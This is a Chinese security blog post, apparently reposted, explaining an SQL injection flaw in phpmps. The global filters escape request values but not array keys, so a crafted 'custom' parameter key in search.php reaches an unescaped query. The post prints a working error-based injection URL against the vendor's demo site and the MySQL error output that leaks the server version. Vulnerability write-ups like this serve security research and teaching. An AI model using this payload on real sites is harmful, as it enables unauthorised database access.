phpmps弱过滤导致注入漏洞

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2020年1月1日04:34:37评论408 views字数 1508阅读5分1秒阅读模式
摘要

首先全局过滤文件 addslashes_deep和sql_replace全部是针对数组的value的所以 key呢。。。
[php]
if(!get_magic_quotes_gpc()) {

首先全局过滤文件 addslashes_deep和sql_replace全部是针对数组的value的

所以 key呢。。。
[php]
if(!get_magic_quotes_gpc()) {

if (!empty($_GET))$_GET = addslashes_deep($_GET);

if (!empty($_POST))$_POST = addslashes_deep($_POST);

$_COOKIE = addslashes_deep($_COOKIE);

$_REQUEST = addslashes_deep($_REQUEST);

}

if (!empty($_REQUEST))$_REQUEST = sql_replace($_REQUEST);

if (!empty($_POST))$_POST = sql_replace($_POST);

if (!empty($_GET))$_GET = sql_replace($_GET);

unset($_REQUEST['table']);
[/php]
由于key被忽视 所以在/search.php 下
[php]
if(!empty($_REQUEST['custom'])) {

$sql = "SELECT infoid, COUNT(*) AS num FROM {$table}cus_value WHERE 0 ";

foreach($_REQUEST['custom'] AS $key => $val) {

if(!empty($val)) {

$cus_num++;

$sql .= " or (1 ";

if(is_array($val)) {

$cus_tom = get_custom_info($key);

$sql .= " AND cusid = '$key'";
[/php]
get_custom_info($key)

在function get_custom_info($cusid='')里面
[php]
$sql = "select * from {$table}custom where cusid='$cusid' ";

$res = $db->query($sql);
[/php]
直接查询了

导致注入

http://www.phpmps.com/demo/search.php?custom[xss%27)%20AND%20(SELECT%208734%20FROM(SELECT%20COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23]=1

返回信息,成功获取版本信息:

[php]
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT infoid, COUNT(*) AS num FROM demo_cus_value WHERE 0 or (1 AND cusid = 'xss') AND (SELECT 8734 FROM(SELECT COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)#' AND cusvalue like '%1%' ) GROUP BY infoid HAVING num = '1' ) [2] => Array ( [error] => Duplicate entry '5.0.96-community-nt1' for key 1 ) [3] => Array ( [errno] => 1062 ) )
[/php]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:34:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpmps弱过滤导致注入漏洞http://cn-sec.com/archives/75871.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息